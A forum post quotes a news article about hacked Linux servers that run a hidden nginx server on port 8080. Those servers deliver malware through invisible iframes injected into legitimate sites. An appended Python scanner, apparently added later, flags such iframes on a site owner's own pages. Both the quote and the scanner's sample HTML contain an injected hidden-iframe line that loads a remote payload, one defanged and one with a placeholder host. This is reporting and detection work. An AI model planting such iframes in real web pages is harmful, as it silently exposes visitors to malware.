Old 09-17-2009, 11:20 AM  
borked
Totally Borked
Join Date: Feb 2005
Posts: 6,284
And another reason not to use FTP, but SFTP...

Quote:
A security researcher has discovered a cluster of infected Linux servers that have been corralled into a special ops botnet of sorts and used to distribute malware to unwitting people browsing the web.

Each of the infected machines examined so far is a dedicated or virtual dedicated server running a legitimate website, Denis Sinegubko, an independent researcher based in Magnitogorsk, Russia, told The Register. But in addition to running an Apache webserver to dish up benign content, they've also been hacked to run a second webserver known as nginx, which serves malware.
...
The infected machines observed by Sinegubko serve legitimate traffic on port 80, the standard TCP port used by websites. Behind the scenes, the rogue server sends malicious traffic over port 8080. The malicious payloads are then delivered with the help of dynamic DNS hosting providers, which offer free domain names that are mapped to the IP address of the zombie webserver.

The links look something like this:
Code:
<i_frame src="http ://a86x . homeunix . org:8080/ts/in.cgi?open2" width=997 height=0 style="visibility: hidden"></iframe>
They are injected into legitimate websites, so that they are surreptitiously served when users browse the infected page.

It's unclear exactly how the servers have become infected. Sinegubko speculates they belong to careless administrators who allowed their root passwords to be sniffed. Indeed, the part of the multi-staged attack that plants malicious iframes into legitimate webpages uses FTP passwords that have been stolen using password sniffers. It's likely the zombie servers were compromised in the same fashion, he explained.
__________________

For coding work - hit me up on andy // borkedcoder // com
(consider figuring out the email as test #1)

All models are wrong, but some are useful. George E.P. Box. p202
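Added example, not code from the post or from the article it quotes: a small Python scanner, using only the standard library, that a site owner can run over their own pages to flag iframes showing the indicators the quoted article describes (zero height or width, `visibility: hidden` or `display: none`, and a `src` that points at a non-standard port such as 8080). The sample HTML is constructed; `malicious-host.example` is a placeholder standing in for the dynamic-DNS hostnames the article mentions (the real hostname is defanged in the post and is not reproduced here). Each finding carries the reasons it was flagged, so a benign embedded video frame is not reported while the hidden injected frame is.

```python
"""Scan HTML for injected hidden iframes of the kind described in the quoted article.

Added example (not from the forum post). Heuristics:
  * zero-size frame (height=0 or width=0)
  * hidden via CSS (visibility:hidden / display:none in the style attribute)
  * src points at a port other than 80/443 (the article's payloads used 8080)
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Ports a legitimate embedded frame normally uses; None means "no explicit port".
STANDARD_PORTS = {None, 80, 443}


class IframeCollector(HTMLParser):
    """Collect the attribute dicts of every <iframe> start tag in a document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            # Normalise attribute names to lower case; missing values become "".
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _is_zero(value):
    """True if a width/height attribute evaluates to zero ("0", "0px", " 0 ")."""
    cleaned = value.strip().lower().rstrip("px")
    try:
        return float(cleaned) == 0
    except ValueError:
        return False


def _hidden_style(style):
    """True if the inline style hides the element."""
    compact = style.replace(" ", "").lower()
    return "visibility:hidden" in compact or "display:none" in compact


def assess_iframe(attrs):
    """Return the list of reasons an iframe looks injected; empty list if it looks benign."""
    reasons = []
    if _is_zero(attrs.get("height", "")) or _is_zero(attrs.get("width", "")):
        reasons.append("zero-size frame")
    if _hidden_style(attrs.get("style", "")):
        reasons.append("hidden via CSS")
    parts = urlsplit(attrs.get("src", ""))
    try:
        port = parts.port  # None when no port is given in the URL
    except ValueError:
        port = None
        reasons.append("unparseable port in src")
    if port not in STANDARD_PORTS:
        reasons.append(f"non-standard port {port}")
    return reasons


def find_suspicious_iframes(html):
    """Parse `html` and return one finding per iframe that trips a heuristic."""
    parser = IframeCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for attrs in parser.iframes:
        reasons = assess_iframe(attrs)
        if reasons:
            findings.append({"src": attrs.get("src", ""), "reasons": reasons})
    return findings


# Constructed sample page: one benign embed and one injected hidden frame.
# "malicious-host.example" is a placeholder, not a real indicator.
SAMPLE_HTML = """
<html><body>
<h1>Welcome</h1>
<iframe width=560 height=315 src="https://www.example.com/embed/video"></iframe>
<p>Legitimate content.</p>
<iframe src="http://malicious-host.example:8080/ts/in.cgi?open2" width=997 height=0 style="visibility: hidden"></iframe>
</body></html>
"""

if __name__ == "__main__":
    for finding in find_suspicious_iframes(SAMPLE_HTML):
        print(finding["src"], "->", ", ".join(finding["reasons"]))
```

The three heuristics are deliberately independent: an attacker who drops the hidden style still trips the zero-height check, and a frame served from a non-standard port is reported even when it is visible, so the scanner errs toward reporting and a human reviews the short list.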